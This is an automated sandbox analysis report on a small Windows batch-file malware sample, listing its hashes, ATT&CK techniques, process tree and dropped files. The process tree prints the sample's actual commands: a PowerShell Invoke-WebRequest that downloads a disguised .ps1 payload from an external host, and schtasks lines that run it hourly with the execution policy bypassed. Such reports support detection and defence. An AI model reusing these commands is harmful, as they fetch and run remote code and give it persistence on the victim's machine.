9994b9e197b422529221de7238dc0e44ae21e66d78c48355f31837c3696ec90e

Analysis

max time kernel
147s
max time network
158s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
30-12-2024 05:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

10b20d5ab63333029b484bf4fc528e6cd4dc755c99c31c24054d63f9e3447c1c.bat
Size

935B
MD5

1c94a162524f1ab324eb20ab36123aa9
SHA1

2d0bd3e465120d8161a30782724f6381130c3e6a
SHA256

10b20d5ab63333029b484bf4fc528e6cd4dc755c99c31c24054d63f9e3447c1c
SHA512

f4252f79627dcf11c7b378a51503651476a10b22638b2797f6d6d33ef268acb54a1a37b0d2ba18535c9354470490261fef88d6a9aae6fde57c8388e035c12d3a

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
13	1644	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
1644	powershell.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4480	schtasks.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1644	powershell.exe
1644	powershell.exe
3036	powershell.exe
3036	powershell.exe
4684	powershell.exe
4684	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1644	powershell.exe
Token: SeDebugPrivilege	3036	powershell.exe
Token: SeDebugPrivilege	4684	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 4548 wrote to memory of 4480	4548	cmd.exe	82
PID 4548 wrote to memory of 4480	4548	cmd.exe	82
PID 4548 wrote to memory of 1644	4548	cmd.exe	83
PID 4548 wrote to memory of 1644	4548	cmd.exe	83
PID 4548 wrote to memory of 2316	4548	cmd.exe	84
PID 4548 wrote to memory of 2316	4548	cmd.exe	84
PID 4548 wrote to memory of 4304	4548	cmd.exe	87
PID 4548 wrote to memory of 4304	4548	cmd.exe	87
PID 4304 wrote to memory of 3036	4304	cmd.exe	88
PID 4304 wrote to memory of 3036	4304	cmd.exe	88
PID 692 wrote to memory of 4684	692	cmd.EXE	90
PID 692 wrote to memory of 4684	692	cmd.EXE	90

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10b20d5ab63333029b484bf4fc528e6cd4dc755c99c31c24054d63f9e3447c1c.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4548
- C:\Windows\system32\schtasks.exe
  schtasks /create /tn "Octanagem" /tr "cmd /c start /min PowerShell -ex Bypass C:\Users\Public\American.ps1" /SC HOURLY /mo 6 /f
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4480
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri 'https://hoteltoscanaplaza.com.co/cgi-bin/Atendimento.pdf' -OutFile 'C:\Users\Public\American.ps1'"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1644
- C:\Windows\system32\schtasks.exe
  schtasks /run /tn "Octanagem"
  2⤵
  PID:2316
- C:\Windows\system32\cmd.exe
  cmd /c start /min PowerShell -ex Bypass C:\Users\Public\American.ps1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4304
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -ex Bypass C:\Users\Public\American.ps1
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3036

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c start /min PowerShell -ex Bypass C:\Users\Public\American.ps1
1⤵
- Suspicious use of WriteProcessMemory
PID:692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -ex Bypass C:\Users\Public\American.ps1
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4684

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
69c50431162d6076acb21efd029163ec

SHA1
800f73ede5008bee7ec932209fa764294bcdc256

SHA256
6798e2f7779ff2adbdf04f2f95d6df9e2127515d05bcfc982d349ab3783ef6b8

SHA512
5db697f484d98cacd19ad9987b7bd5b32098a5f2bfc75df78b2c44be7321cb86b1189f1c4959681e5ca41399eb56464825082c8ac59d7962b7f724a1002a9081

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
692a440f9cfbeaf648632aead685a5a1

SHA1
e4e4bd8405be77294f4be5ea18b5e05b139f35af

SHA256
3e1615e7774bd98860c984570515c293b64cf07f1b8e6688a72e78fa9ebed0f4

SHA512
c7501a0fc978d0f06f32c4a205246763796a20c0b2514f00cb6676c8c95ab38d463b87c2973ca2b9b3e2fee3bc7ded869f5896c498303397167c4b5f069db519

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v2dtgngh.veq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
30daecc1ea3a553cc6763d598a022976

SHA1
0cf56cfa34088cb13077e36d65923a58864d0188

SHA256
dbe3d117a24924fbd9108a938afeaadd911f545a22597eb66162096f0e151c02

SHA512
abb14b489a69ba7f706d2e3136ae4faf5a2b79d309deefc2ec10a58c0216bf5bb0327a769371ae97e1eaaddf3176dd48166920af73b49a0a65480d86ddef468f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
cf75271381ab3e9123d3c58e07ee1cff

SHA1
26acdf1b7ef580d87cd18971e40bdceca97b852c

SHA256
af584386f7e155fcf0b315da51c21b9fea1744d3647521a3c3fa4e1e8af2bbdc

SHA512
86b42da0a55184953635f04b2ddb151d6ea0b50515b5716757427d71d645f2299e26440849139727b1265ed0305957e269da4e216994480e78e6f2dd717c84e0

Download Submit
memory/1644-11-0x00007FF9024F0000-0x00007FF902FB1000-memory.dmp

Filesize
10.8MB

Download
memory/1644-16-0x00007FF9024F0000-0x00007FF902FB1000-memory.dmp

Filesize
10.8MB

Download
memory/1644-19-0x00007FF9024F0000-0x00007FF902FB1000-memory.dmp

Filesize
10.8MB

Download
memory/1644-15-0x00007FF9024F0000-0x00007FF902FB1000-memory.dmp

Filesize
10.8MB

Download
memory/1644-13-0x0000021BA38B0000-0x0000021BA4056000-memory.dmp

Filesize
7.6MB

Download
memory/1644-12-0x00007FF9024F0000-0x00007FF902FB1000-memory.dmp

Filesize
10.8MB

Download
memory/1644-0-0x00007FF9024F3000-0x00007FF9024F5000-memory.dmp

Filesize
8KB

Download
memory/1644-1-0x0000021BA2C20000-0x0000021BA2C42000-memory.dmp

Filesize
136KB

Download